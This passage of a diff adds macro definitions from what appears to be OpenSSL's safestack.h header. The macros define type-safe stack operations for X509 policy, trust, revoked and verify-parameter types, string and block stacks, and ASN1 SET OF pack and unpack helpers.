+# define sk_X509_OBJECT_sort(st) SKM_sk_sort(X509_OBJECT, (st))
+# define sk_X509_OBJECT_is_sorted(st) SKM_sk_is_sorted(X509_OBJECT, (st))
+# define sk_X509_POLICY_DATA_new(cmp) SKM_sk_new(X509_POLICY_DATA, (cmp))
+# define sk_X509_POLICY_DATA_new_null() SKM_sk_new_null(X509_POLICY_DATA)
+# define sk_X509_POLICY_DATA_free(st) SKM_sk_free(X509_POLICY_DATA, (st))
+# define sk_X509_POLICY_DATA_num(st) SKM_sk_num(X509_POLICY_DATA, (st))
+# define sk_X509_POLICY_DATA_value(st, i) SKM_sk_value(X509_POLICY_DATA, (st), (i))
+# define sk_X509_POLICY_DATA_set(st, i, val) SKM_sk_set(X509_POLICY_DATA, (st), (i), (val))
+# define sk_X509_POLICY_DATA_zero(st) SKM_sk_zero(X509_POLICY_DATA, (st))
+# define sk_X509_POLICY_DATA_push(st, val) SKM_sk_push(X509_POLICY_DATA, (st), (val))
+# define sk_X509_POLICY_DATA_unshift(st, val) SKM_sk_unshift(X509_POLICY_DATA, (st), (val))
+# define sk_X509_POLICY_DATA_find(st, val) SKM_sk_find(X509_POLICY_DATA, (st), (val))
+# define sk_X509_POLICY_DATA_find_ex(st, val) SKM_sk_find_ex(X509_POLICY_DATA, (st), (val))
+# define sk_X509_POLICY_DATA_delete(st, i) SKM_sk_delete(X509_POLICY_DATA, (st), (i))
+# define sk_X509_POLICY_DATA_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_POLICY_DATA, (st), (ptr))
+# define sk_X509_POLICY_DATA_insert(st, val, i) SKM_sk_insert(X509_POLICY_DATA, (st), (val), (i))
+# define sk_X509_POLICY_DATA_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_POLICY_DATA, (st), (cmp))
+# define sk_X509_POLICY_DATA_dup(st) SKM_sk_dup(X509_POLICY_DATA, st)
+# define sk_X509_POLICY_DATA_pop_free(st, free_func) SKM_sk_pop_free(X509_POLICY_DATA, (st), (free_func))
+# define sk_X509_POLICY_DATA_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(X509_POLICY_DATA, (st), (copy_func), (free_func))
+# define sk_X509_POLICY_DATA_shift(st) SKM_sk_shift(X509_POLICY_DATA, (st))
+# define sk_X509_POLICY_DATA_pop(st) SKM_sk_pop(X509_POLICY_DATA, (st))
+# define sk_X509_POLICY_DATA_sort(st) SKM_sk_sort(X509_POLICY_DATA, (st))
+# define sk_X509_POLICY_DATA_is_sorted(st) SKM_sk_is_sorted(X509_POLICY_DATA, (st))
+# define sk_X509_POLICY_NODE_new(cmp) SKM_sk_new(X509_POLICY_NODE, (cmp))
+# define sk_X509_POLICY_NODE_new_null() SKM_sk_new_null(X509_POLICY_NODE)
+# define sk_X509_POLICY_NODE_free(st) SKM_sk_free(X509_POLICY_NODE, (st))
+# define sk_X509_POLICY_NODE_num(st) SKM_sk_num(X509_POLICY_NODE, (st))
+# define sk_X509_POLICY_NODE_value(st, i) SKM_sk_value(X509_POLICY_NODE, (st), (i))
+# define sk_X509_POLICY_NODE_set(st, i, val) SKM_sk_set(X509_POLICY_NODE, (st), (i), (val))
+# define sk_X509_POLICY_NODE_zero(st) SKM_sk_zero(X509_POLICY_NODE, (st))
+# define sk_X509_POLICY_NODE_push(st, val) SKM_sk_push(X509_POLICY_NODE, (st), (val))
+# define sk_X509_POLICY_NODE_unshift(st, val) SKM_sk_unshift(X509_POLICY_NODE, (st), (val))
+# define sk_X509_POLICY_NODE_find(st, val) SKM_sk_find(X509_POLICY_NODE, (st), (val))
+# define sk_X509_POLICY_NODE_find_ex(st, val) SKM_sk_find_ex(X509_POLICY_NODE, (st), (val))
+# define sk_X509_POLICY_NODE_delete(st, i) SKM_sk_delete(X509_POLICY_NODE, (st), (i))
+# define sk_X509_POLICY_NODE_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_POLICY_NODE, (st), (ptr))
+# define sk_X509_POLICY_NODE_insert(st, val, i) SKM_sk_insert(X509_POLICY_NODE, (st), (val), (i))
+# define sk_X509_POLICY_NODE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_POLICY_NODE, (st), (cmp))
+# define sk_X509_POLICY_NODE_dup(st) SKM_sk_dup(X509_POLICY_NODE, st)
+# define sk_X509_POLICY_NODE_pop_free(st, free_func) SKM_sk_pop_free(X509_POLICY_NODE, (st), (free_func))
+# define sk_X509_POLICY_NODE_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(X509_POLICY_NODE, (st), (copy_func), (free_func))
+# define sk_X509_POLICY_NODE_shift(st) SKM_sk_shift(X509_POLICY_NODE, (st))
+# define sk_X509_POLICY_NODE_pop(st) SKM_sk_pop(X509_POLICY_NODE, (st))
+# define sk_X509_POLICY_NODE_sort(st) SKM_sk_sort(X509_POLICY_NODE, (st))
+# define sk_X509_POLICY_NODE_is_sorted(st) SKM_sk_is_sorted(X509_POLICY_NODE, (st))
+# define sk_X509_PURPOSE_new(cmp) SKM_sk_new(X509_PURPOSE, (cmp))
+# define sk_X509_PURPOSE_new_null() SKM_sk_new_null(X509_PURPOSE)
+# define sk_X509_PURPOSE_free(st) SKM_sk_free(X509_PURPOSE, (st))
+# define sk_X509_PURPOSE_num(st) SKM_sk_num(X509_PURPOSE, (st))
+# define sk_X509_PURPOSE_value(st, i) SKM_sk_value(X509_PURPOSE, (st), (i))
+# define sk_X509_PURPOSE_set(st, i, val) SKM_sk_set(X509_PURPOSE, (st), (i), (val))
+# define sk_X509_PURPOSE_zero(st) SKM_sk_zero(X509_PURPOSE, (st))
+# define sk_X509_PURPOSE_push(st, val) SKM_sk_push(X509_PURPOSE, (st), (val))
+# define sk_X509_PURPOSE_unshift(st, val) SKM_sk_unshift(X509_PURPOSE, (st), (val))
+# define sk_X509_PURPOSE_find(st, val) SKM_sk_find(X509_PURPOSE, (st), (val))
+# define sk_X509_PURPOSE_find_ex(st, val) SKM_sk_find_ex(X509_PURPOSE, (st), (val))
+# define sk_X509_PURPOSE_delete(st, i) SKM_sk_delete(X509_PURPOSE, (st), (i))
+# define sk_X509_PURPOSE_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_PURPOSE, (st), (ptr))
+# define sk_X509_PURPOSE_insert(st, val, i) SKM_sk_insert(X509_PURPOSE, (st), (val), (i))
+# define sk_X509_PURPOSE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_PURPOSE, (st), (cmp))
+# define sk_X509_PURPOSE_dup(st) SKM_sk_dup(X509_PURPOSE, st)
+# define sk_X509_PURPOSE_pop_free(st, free_func) SKM_sk_pop_free(X509_PURPOSE, (st), (free_func))
+# define sk_X509_PURPOSE_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(X509_PURPOSE, (st), (copy_func), (free_func))
+# define sk_X509_PURPOSE_shift(st) SKM_sk_shift(X509_PURPOSE, (st))
+# define sk_X509_PURPOSE_pop(st) SKM_sk_pop(X509_PURPOSE, (st))
+# define sk_X509_PURPOSE_sort(st) SKM_sk_sort(X509_PURPOSE, (st))
+# define sk_X509_PURPOSE_is_sorted(st) SKM_sk_is_sorted(X509_PURPOSE, (st))
+# define sk_X509_REVOKED_new(cmp) SKM_sk_new(X509_REVOKED, (cmp))
+# define sk_X509_REVOKED_new_null() SKM_sk_new_null(X509_REVOKED)
+# define sk_X509_REVOKED_free(st) SKM_sk_free(X509_REVOKED, (st))
+# define sk_X509_REVOKED_num(st) SKM_sk_num(X509_REVOKED, (st))
+# define sk_X509_REVOKED_value(st, i) SKM_sk_value(X509_REVOKED, (st), (i))
+# define sk_X509_REVOKED_set(st, i, val) SKM_sk_set(X509_REVOKED, (st), (i), (val))
+# define sk_X509_REVOKED_zero(st) SKM_sk_zero(X509_REVOKED, (st))
+# define sk_X509_REVOKED_push(st, val) SKM_sk_push(X509_REVOKED, (st), (val))
+# define sk_X509_REVOKED_unshift(st, val) SKM_sk_unshift(X509_REVOKED, (st), (val))
+# define sk_X509_REVOKED_find(st, val) SKM_sk_find(X509_REVOKED, (st), (val))
+# define sk_X509_REVOKED_find_ex(st, val) SKM_sk_find_ex(X509_REVOKED, (st), (val))
+# define sk_X509_REVOKED_delete(st, i) SKM_sk_delete(X509_REVOKED, (st), (i))
+# define sk_X509_REVOKED_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_REVOKED, (st), (ptr))
+# define sk_X509_REVOKED_insert(st, val, i) SKM_sk_insert(X509_REVOKED, (st), (val), (i))
+# define sk_X509_REVOKED_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_REVOKED, (st), (cmp))
+# define sk_X509_REVOKED_dup(st) SKM_sk_dup(X509_REVOKED, st)
+# define sk_X509_REVOKED_pop_free(st, free_func) SKM_sk_pop_free(X509_REVOKED, (st), (free_func))
+# define sk_X509_REVOKED_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(X509_REVOKED, (st), (copy_func), (free_func))
+# define sk_X509_REVOKED_shift(st) SKM_sk_shift(X509_REVOKED, (st))
+# define sk_X509_REVOKED_pop(st) SKM_sk_pop(X509_REVOKED, (st))
+# define sk_X509_REVOKED_sort(st) SKM_sk_sort(X509_REVOKED, (st))
+# define sk_X509_REVOKED_is_sorted(st) SKM_sk_is_sorted(X509_REVOKED, (st))
+# define sk_X509_TRUST_new(cmp) SKM_sk_new(X509_TRUST, (cmp))
+# define sk_X509_TRUST_new_null() SKM_sk_new_null(X509_TRUST)
+# define sk_X509_TRUST_free(st) SKM_sk_free(X509_TRUST, (st))
+# define sk_X509_TRUST_num(st) SKM_sk_num(X509_TRUST, (st))
+# define sk_X509_TRUST_value(st, i) SKM_sk_value(X509_TRUST, (st), (i))
+# define sk_X509_TRUST_set(st, i, val) SKM_sk_set(X509_TRUST, (st), (i), (val))
+# define sk_X509_TRUST_zero(st) SKM_sk_zero(X509_TRUST, (st))
+# define sk_X509_TRUST_push(st, val) SKM_sk_push(X509_TRUST, (st), (val))
+# define sk_X509_TRUST_unshift(st, val) SKM_sk_unshift(X509_TRUST, (st), (val))
+# define sk_X509_TRUST_find(st, val) SKM_sk_find(X509_TRUST, (st), (val))
+# define sk_X509_TRUST_find_ex(st, val) SKM_sk_find_ex(X509_TRUST, (st), (val))
+# define sk_X509_TRUST_delete(st, i) SKM_sk_delete(X509_TRUST, (st), (i))
+# define sk_X509_TRUST_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_TRUST, (st), (ptr))
+# define sk_X509_TRUST_insert(st, val, i) SKM_sk_insert(X509_TRUST, (st), (val), (i))
+# define sk_X509_TRUST_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_TRUST, (st), (cmp))
+# define sk_X509_TRUST_dup(st) SKM_sk_dup(X509_TRUST, st)
+# define sk_X509_TRUST_pop_free(st, free_func) SKM_sk_pop_free(X509_TRUST, (st), (free_func))
+# define sk_X509_TRUST_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(X509_TRUST, (st), (copy_func), (free_func))
+# define sk_X509_TRUST_shift(st) SKM_sk_shift(X509_TRUST, (st))
+# define sk_X509_TRUST_pop(st) SKM_sk_pop(X509_TRUST, (st))
+# define sk_X509_TRUST_sort(st) SKM_sk_sort(X509_TRUST, (st))
+# define sk_X509_TRUST_is_sorted(st) SKM_sk_is_sorted(X509_TRUST, (st))
+# define sk_X509_VERIFY_PARAM_new(cmp) SKM_sk_new(X509_VERIFY_PARAM, (cmp))
+# define sk_X509_VERIFY_PARAM_new_null() SKM_sk_new_null(X509_VERIFY_PARAM)
+# define sk_X509_VERIFY_PARAM_free(st) SKM_sk_free(X509_VERIFY_PARAM, (st))
+# define sk_X509_VERIFY_PARAM_num(st) SKM_sk_num(X509_VERIFY_PARAM, (st))
+# define sk_X509_VERIFY_PARAM_value(st, i) SKM_sk_value(X509_VERIFY_PARAM, (st), (i))
+# define sk_X509_VERIFY_PARAM_set(st, i, val) SKM_sk_set(X509_VERIFY_PARAM, (st), (i), (val))
+# define sk_X509_VERIFY_PARAM_zero(st) SKM_sk_zero(X509_VERIFY_PARAM, (st))
+# define sk_X509_VERIFY_PARAM_push(st, val) SKM_sk_push(X509_VERIFY_PARAM, (st), (val))
+# define sk_X509_VERIFY_PARAM_unshift(st, val) SKM_sk_unshift(X509_VERIFY_PARAM, (st), (val))
+# define sk_X509_VERIFY_PARAM_find(st, val) SKM_sk_find(X509_VERIFY_PARAM, (st), (val))
+# define sk_X509_VERIFY_PARAM_find_ex(st, val) SKM_sk_find_ex(X509_VERIFY_PARAM, (st), (val))
+# define sk_X509_VERIFY_PARAM_delete(st, i) SKM_sk_delete(X509_VERIFY_PARAM, (st), (i))
+# define sk_X509_VERIFY_PARAM_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_VERIFY_PARAM, (st), (ptr))
+# define sk_X509_VERIFY_PARAM_insert(st, val, i) SKM_sk_insert(X509_VERIFY_PARAM, (st), (val), (i))
+# define sk_X509_VERIFY_PARAM_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_VERIFY_PARAM, (st), (cmp))
+# define sk_X509_VERIFY_PARAM_dup(st) SKM_sk_dup(X509_VERIFY_PARAM, st)
+# define sk_X509_VERIFY_PARAM_pop_free(st, free_func) SKM_sk_pop_free(X509_VERIFY_PARAM, (st), (free_func))
+# define sk_X509_VERIFY_PARAM_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(X509_VERIFY_PARAM, (st), (copy_func), (free_func))
+# define sk_X509_VERIFY_PARAM_shift(st) SKM_sk_shift(X509_VERIFY_PARAM, (st))
+# define sk_X509_VERIFY_PARAM_pop(st) SKM_sk_pop(X509_VERIFY_PARAM, (st))
+# define sk_X509_VERIFY_PARAM_sort(st) SKM_sk_sort(X509_VERIFY_PARAM, (st))
+# define sk_X509_VERIFY_PARAM_is_sorted(st) SKM_sk_is_sorted(X509_VERIFY_PARAM, (st))
+# define sk_nid_triple_new(cmp) SKM_sk_new(nid_triple, (cmp))
+# define sk_nid_triple_new_null() SKM_sk_new_null(nid_triple)
+# define sk_nid_triple_free(st) SKM_sk_free(nid_triple, (st))
+# define sk_nid_triple_num(st) SKM_sk_num(nid_triple, (st))
+# define sk_nid_triple_value(st, i) SKM_sk_value(nid_triple, (st), (i))
+# define sk_nid_triple_set(st, i, val) SKM_sk_set(nid_triple, (st), (i), (val))
+# define sk_nid_triple_zero(st) SKM_sk_zero(nid_triple, (st))
+# define sk_nid_triple_push(st, val) SKM_sk_push(nid_triple, (st), (val))
+# define sk_nid_triple_unshift(st, val) SKM_sk_unshift(nid_triple, (st), (val))
+# define sk_nid_triple_find(st, val) SKM_sk_find(nid_triple, (st), (val))
+# define sk_nid_triple_find_ex(st, val) SKM_sk_find_ex(nid_triple, (st), (val))
+# define sk_nid_triple_delete(st, i) SKM_sk_delete(nid_triple, (st), (i))
+# define sk_nid_triple_delete_ptr(st, ptr) SKM_sk_delete_ptr(nid_triple, (st), (ptr))
+# define sk_nid_triple_insert(st, val, i) SKM_sk_insert(nid_triple, (st), (val), (i))
+# define sk_nid_triple_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(nid_triple, (st), (cmp))
+# define sk_nid_triple_dup(st) SKM_sk_dup(nid_triple, st)
+# define sk_nid_triple_pop_free(st, free_func) SKM_sk_pop_free(nid_triple, (st), (free_func))
+# define sk_nid_triple_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(nid_triple, (st), (copy_func), (free_func))
+# define sk_nid_triple_shift(st) SKM_sk_shift(nid_triple, (st))
+# define sk_nid_triple_pop(st) SKM_sk_pop(nid_triple, (st))
+# define sk_nid_triple_sort(st) SKM_sk_sort(nid_triple, (st))
+# define sk_nid_triple_is_sorted(st) SKM_sk_is_sorted(nid_triple, (st))
+# define sk_void_new(cmp) SKM_sk_new(void, (cmp))
+# define sk_void_new_null() SKM_sk_new_null(void)
+# define sk_void_free(st) SKM_sk_free(void, (st))
+# define sk_void_num(st) SKM_sk_num(void, (st))
+# define sk_void_value(st, i) SKM_sk_value(void, (st), (i))
+# define sk_void_set(st, i, val) SKM_sk_set(void, (st), (i), (val))
+# define sk_void_zero(st) SKM_sk_zero(void, (st))
+# define sk_void_push(st, val) SKM_sk_push(void, (st), (val))
+# define sk_void_unshift(st, val) SKM_sk_unshift(void, (st), (val))
+# define sk_void_find(st, val) SKM_sk_find(void, (st), (val))
+# define sk_void_find_ex(st, val) SKM_sk_find_ex(void, (st), (val))
+# define sk_void_delete(st, i) SKM_sk_delete(void, (st), (i))
+# define sk_void_delete_ptr(st, ptr) SKM_sk_delete_ptr(void, (st), (ptr))
+# define sk_void_insert(st, val, i) SKM_sk_insert(void, (st), (val), (i))
+# define sk_void_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(void, (st), (cmp))
+# define sk_void_dup(st) SKM_sk_dup(void, st)
+# define sk_void_pop_free(st, free_func) SKM_sk_pop_free(void, (st), (free_func))
+# define sk_void_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(void, (st), (copy_func), (free_func))
+# define sk_void_shift(st) SKM_sk_shift(void, (st))
+# define sk_void_pop(st) SKM_sk_pop(void, (st))
+# define sk_void_sort(st) SKM_sk_sort(void, (st))
+# define sk_void_is_sorted(st) SKM_sk_is_sorted(void, (st))
+# define sk_OPENSSL_STRING_new(cmp) ((STACK_OF(OPENSSL_STRING) *)sk_new(CHECKED_SK_CMP_FUNC(char, cmp)))
+# define sk_OPENSSL_STRING_new_null() ((STACK_OF(OPENSSL_STRING) *)sk_new_null())
+# define sk_OPENSSL_STRING_push(st, val) sk_push(CHECKED_STACK_OF(OPENSSL_STRING, st), CHECKED_PTR_OF(char, val))
+# define sk_OPENSSL_STRING_find(st, val) sk_find(CHECKED_STACK_OF(OPENSSL_STRING, st), CHECKED_PTR_OF(char, val))
+# define sk_OPENSSL_STRING_value(st, i) ((OPENSSL_STRING)sk_value(CHECKED_STACK_OF(OPENSSL_STRING, st), i))
+# define sk_OPENSSL_STRING_num(st) SKM_sk_num(OPENSSL_STRING, st)
+# define sk_OPENSSL_STRING_pop_free(st, free_func) sk_pop_free(CHECKED_STACK_OF(OPENSSL_STRING, st), CHECKED_SK_FREE_FUNC(char, free_func))
+# define sk_OPENSSL_STRING_deep_copy(st, copy_func, free_func) ((STACK_OF(OPENSSL_STRING) *)sk_deep_copy(CHECKED_STACK_OF(OPENSSL_STRING, st), CHECKED_SK_COPY_FUNC(char, copy_func), CHECKED_SK_FREE_FUNC(char, free_func)))
+# define sk_OPENSSL_STRING_insert(st, val, i) sk_insert(CHECKED_STACK_OF(OPENSSL_STRING, st), CHECKED_PTR_OF(char, val), i)
+# define sk_OPENSSL_STRING_free(st) SKM_sk_free(OPENSSL_STRING, st)
+# define sk_OPENSSL_STRING_set(st, i, val) sk_set(CHECKED_STACK_OF(OPENSSL_STRING, st), i, CHECKED_PTR_OF(char, val))
+# define sk_OPENSSL_STRING_zero(st) SKM_sk_zero(OPENSSL_STRING, (st))
+# define sk_OPENSSL_STRING_unshift(st, val) sk_unshift(CHECKED_STACK_OF(OPENSSL_STRING, st), CHECKED_PTR_OF(char, val))
+# define sk_OPENSSL_STRING_find_ex(st, val) sk_find_ex((_STACK *)CHECKED_CONST_PTR_OF(STACK_OF(OPENSSL_STRING), st), CHECKED_CONST_PTR_OF(char, val))
+# define sk_OPENSSL_STRING_delete(st, i) SKM_sk_delete(OPENSSL_STRING, (st), (i))
+# define sk_OPENSSL_STRING_delete_ptr(st, ptr) (OPENSSL_STRING *)sk_delete_ptr(CHECKED_STACK_OF(OPENSSL_STRING, st), CHECKED_PTR_OF(char, ptr))
+# define sk_OPENSSL_STRING_set_cmp_func(st, cmp)  \
+        ((int (*)(const char * const *,const char * const *)) \
+        sk_set_cmp_func(CHECKED_STACK_OF(OPENSSL_STRING, st), CHECKED_SK_CMP_FUNC(char, cmp)))
+# define sk_OPENSSL_STRING_dup(st) SKM_sk_dup(OPENSSL_STRING, st)
+# define sk_OPENSSL_STRING_shift(st) SKM_sk_shift(OPENSSL_STRING, (st))
+# define sk_OPENSSL_STRING_pop(st) (char *)sk_pop(CHECKED_STACK_OF(OPENSSL_STRING, st))
+# define sk_OPENSSL_STRING_sort(st) SKM_sk_sort(OPENSSL_STRING, (st))
+# define sk_OPENSSL_STRING_is_sorted(st) SKM_sk_is_sorted(OPENSSL_STRING, (st))
+# define sk_OPENSSL_BLOCK_new(cmp) ((STACK_OF(OPENSSL_BLOCK) *)sk_new(CHECKED_SK_CMP_FUNC(void, cmp)))
+# define sk_OPENSSL_BLOCK_new_null() ((STACK_OF(OPENSSL_BLOCK) *)sk_new_null())
+# define sk_OPENSSL_BLOCK_push(st, val) sk_push(CHECKED_STACK_OF(OPENSSL_BLOCK, st), CHECKED_PTR_OF(void, val))
+# define sk_OPENSSL_BLOCK_find(st, val) sk_find(CHECKED_STACK_OF(OPENSSL_BLOCK, st), CHECKED_PTR_OF(void, val))
+# define sk_OPENSSL_BLOCK_value(st, i) ((OPENSSL_BLOCK)sk_value(CHECKED_STACK_OF(OPENSSL_BLOCK, st), i))
+# define sk_OPENSSL_BLOCK_num(st) SKM_sk_num(OPENSSL_BLOCK, st)
+# define sk_OPENSSL_BLOCK_pop_free(st, free_func) sk_pop_free(CHECKED_STACK_OF(OPENSSL_BLOCK, st), CHECKED_SK_FREE_FUNC(void, free_func))
+# define sk_OPENSSL_BLOCK_deep_copy(st, copy_func, free_func) ((STACK_OF(OPENSSL_BLOCK) *)sk_deep_copy(CHECKED_STACK_OF(OPENSSL_BLOCK, st), CHECKED_SK_COPY_FUNC(void, copy_func), CHECKED_SK_FREE_FUNC(void, free_func)))
+# define sk_OPENSSL_BLOCK_insert(st, val, i) sk_insert(CHECKED_STACK_OF(OPENSSL_BLOCK, st), CHECKED_PTR_OF(void, val), i)
+# define sk_OPENSSL_BLOCK_free(st) SKM_sk_free(OPENSSL_BLOCK, st)
+# define sk_OPENSSL_BLOCK_set(st, i, val) sk_set(CHECKED_STACK_OF(OPENSSL_BLOCK, st), i, CHECKED_PTR_OF(void, val))
+# define sk_OPENSSL_BLOCK_zero(st) SKM_sk_zero(OPENSSL_BLOCK, (st))
+# define sk_OPENSSL_BLOCK_unshift(st, val) sk_unshift(CHECKED_STACK_OF(OPENSSL_BLOCK, st), CHECKED_PTR_OF(void, val))
+# define sk_OPENSSL_BLOCK_find_ex(st, val) sk_find_ex((_STACK *)CHECKED_CONST_PTR_OF(STACK_OF(OPENSSL_BLOCK), st), CHECKED_CONST_PTR_OF(void, val))
+# define sk_OPENSSL_BLOCK_delete(st, i) SKM_sk_delete(OPENSSL_BLOCK, (st), (i))
+# define sk_OPENSSL_BLOCK_delete_ptr(st, ptr) (OPENSSL_BLOCK *)sk_delete_ptr(CHECKED_STACK_OF(OPENSSL_BLOCK, st), CHECKED_PTR_OF(void, ptr))
+# define sk_OPENSSL_BLOCK_set_cmp_func(st, cmp)  \
+        ((int (*)(const void * const *,const void * const *)) \
+        sk_set_cmp_func(CHECKED_STACK_OF(OPENSSL_BLOCK, st), CHECKED_SK_CMP_FUNC(void, cmp)))
+# define sk_OPENSSL_BLOCK_dup(st) SKM_sk_dup(OPENSSL_BLOCK, st)
+# define sk_OPENSSL_BLOCK_shift(st) SKM_sk_shift(OPENSSL_BLOCK, (st))
+# define sk_OPENSSL_BLOCK_pop(st) (void *)sk_pop(CHECKED_STACK_OF(OPENSSL_BLOCK, st))
+# define sk_OPENSSL_BLOCK_sort(st) SKM_sk_sort(OPENSSL_BLOCK, (st))
+# define sk_OPENSSL_BLOCK_is_sorted(st) SKM_sk_is_sorted(OPENSSL_BLOCK, (st))
+# define sk_OPENSSL_PSTRING_new(cmp) ((STACK_OF(OPENSSL_PSTRING) *)sk_new(CHECKED_SK_CMP_FUNC(OPENSSL_STRING, cmp)))
+# define sk_OPENSSL_PSTRING_new_null() ((STACK_OF(OPENSSL_PSTRING) *)sk_new_null())
+# define sk_OPENSSL_PSTRING_push(st, val) sk_push(CHECKED_STACK_OF(OPENSSL_PSTRING, st), CHECKED_PTR_OF(OPENSSL_STRING, val))
+# define sk_OPENSSL_PSTRING_find(st, val) sk_find(CHECKED_STACK_OF(OPENSSL_PSTRING, st), CHECKED_PTR_OF(OPENSSL_STRING, val))
+# define sk_OPENSSL_PSTRING_value(st, i) ((OPENSSL_PSTRING)sk_value(CHECKED_STACK_OF(OPENSSL_PSTRING, st), i))
+# define sk_OPENSSL_PSTRING_num(st) SKM_sk_num(OPENSSL_PSTRING, st)
+# define sk_OPENSSL_PSTRING_pop_free(st, free_func) sk_pop_free(CHECKED_STACK_OF(OPENSSL_PSTRING, st), CHECKED_SK_FREE_FUNC(OPENSSL_STRING, free_func))
+# define sk_OPENSSL_PSTRING_deep_copy(st, copy_func, free_func) ((STACK_OF(OPENSSL_PSTRING) *)sk_deep_copy(CHECKED_STACK_OF(OPENSSL_PSTRING, st), CHECKED_SK_COPY_FUNC(OPENSSL_STRING, copy_func), CHECKED_SK_FREE_FUNC(OPENSSL_STRING, free_func)))
+# define sk_OPENSSL_PSTRING_insert(st, val, i) sk_insert(CHECKED_STACK_OF(OPENSSL_PSTRING, st), CHECKED_PTR_OF(OPENSSL_STRING, val), i)
+# define sk_OPENSSL_PSTRING_free(st) SKM_sk_free(OPENSSL_PSTRING, st)
+# define sk_OPENSSL_PSTRING_set(st, i, val) sk_set(CHECKED_STACK_OF(OPENSSL_PSTRING, st), i, CHECKED_PTR_OF(OPENSSL_STRING, val))
+# define sk_OPENSSL_PSTRING_zero(st) SKM_sk_zero(OPENSSL_PSTRING, (st))
+# define sk_OPENSSL_PSTRING_unshift(st, val) sk_unshift(CHECKED_STACK_OF(OPENSSL_PSTRING, st), CHECKED_PTR_OF(OPENSSL_STRING, val))
+# define sk_OPENSSL_PSTRING_find_ex(st, val) sk_find_ex((_STACK *)CHECKED_CONST_PTR_OF(STACK_OF(OPENSSL_PSTRING), st), CHECKED_CONST_PTR_OF(OPENSSL_STRING, val))
+# define sk_OPENSSL_PSTRING_delete(st, i) SKM_sk_delete(OPENSSL_PSTRING, (st), (i))
+# define sk_OPENSSL_PSTRING_delete_ptr(st, ptr) (OPENSSL_PSTRING *)sk_delete_ptr(CHECKED_STACK_OF(OPENSSL_PSTRING, st), CHECKED_PTR_OF(OPENSSL_STRING, ptr))
+# define sk_OPENSSL_PSTRING_set_cmp_func(st, cmp)  \
+        ((int (*)(const OPENSSL_STRING * const *,const OPENSSL_STRING * const *)) \
+        sk_set_cmp_func(CHECKED_STACK_OF(OPENSSL_PSTRING, st), CHECKED_SK_CMP_FUNC(OPENSSL_STRING, cmp)))
+# define sk_OPENSSL_PSTRING_dup(st) SKM_sk_dup(OPENSSL_PSTRING, st)
+# define sk_OPENSSL_PSTRING_shift(st) SKM_sk_shift(OPENSSL_PSTRING, (st))
+# define sk_OPENSSL_PSTRING_pop(st) (OPENSSL_STRING *)sk_pop(CHECKED_STACK_OF(OPENSSL_PSTRING, st))
+# define sk_OPENSSL_PSTRING_sort(st) SKM_sk_sort(OPENSSL_PSTRING, (st))
+# define sk_OPENSSL_PSTRING_is_sorted(st) SKM_sk_is_sorted(OPENSSL_PSTRING, (st))
+# define d2i_ASN1_SET_OF_ACCESS_DESCRIPTION(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
+        SKM_ASN1_SET_OF_d2i(ACCESS_DESCRIPTION, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class))
+# define i2d_ASN1_SET_OF_ACCESS_DESCRIPTION(st, pp, i2d_func, ex_tag, ex_class, is_set) \
+        SKM_ASN1_SET_OF_i2d(ACCESS_DESCRIPTION, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
+# define ASN1_seq_pack_ACCESS_DESCRIPTION(st, i2d_func, buf, len) \
+        SKM_ASN1_seq_pack(ACCESS_DESCRIPTION, (st), (i2d_func), (buf), (len))
+# define ASN1_seq_unpack_ACCESS_DESCRIPTION(buf, len, d2i_func, free_func) \
+        SKM_ASN1_seq_unpack(ACCESS_DESCRIPTION, (buf), (len), (d2i_func), (free_func))
+# define d2i_ASN1_SET_OF_ASN1_INTEGER(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
+        SKM_ASN1_SET_OF_d2i(ASN1_INTEGER, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class))
+# define i2d_ASN1_SET_OF_ASN1_INTEGER(st, pp, i2d_func, ex_tag, ex_class, is_set) \
+        SKM_ASN1_SET_OF_i2d(ASN1_INTEGER, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
+# define ASN1_seq_pack_ASN1_INTEGER(st, i2d_func, buf, len) \
+        SKM_ASN1_seq_pack(ASN1_INTEGER, (st), (i2d_func), (buf), (len))
+# define ASN1_seq_unpack_ASN1_INTEGER(buf, len, d2i_func, free_func) \
+        SKM_ASN1_seq_unpack(ASN1_INTEGER, (buf), (len), (d2i_func), (free_func))
+# define d2i_ASN1_SET_OF_ASN1_OBJECT(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
+        SKM_ASN1_SET_OF_d2i(ASN1_OBJECT, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class))
+# define i2d_ASN1_SET_OF_ASN1_OBJECT(st, pp, i2d_func, ex_tag, ex_class, is_set) \
+        SKM_ASN1_SET_OF_i2d(ASN1_OBJECT, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
+# define ASN1_seq_pack_ASN1_OBJECT(st, i2d_func, buf, len) \
+        SKM_ASN1_seq_pack(ASN1_OBJECT, (st), (i2d_func), (buf), (len))
+# define ASN1_seq_unpack_ASN1_OBJECT(buf, len, d2i_func, free_func) \
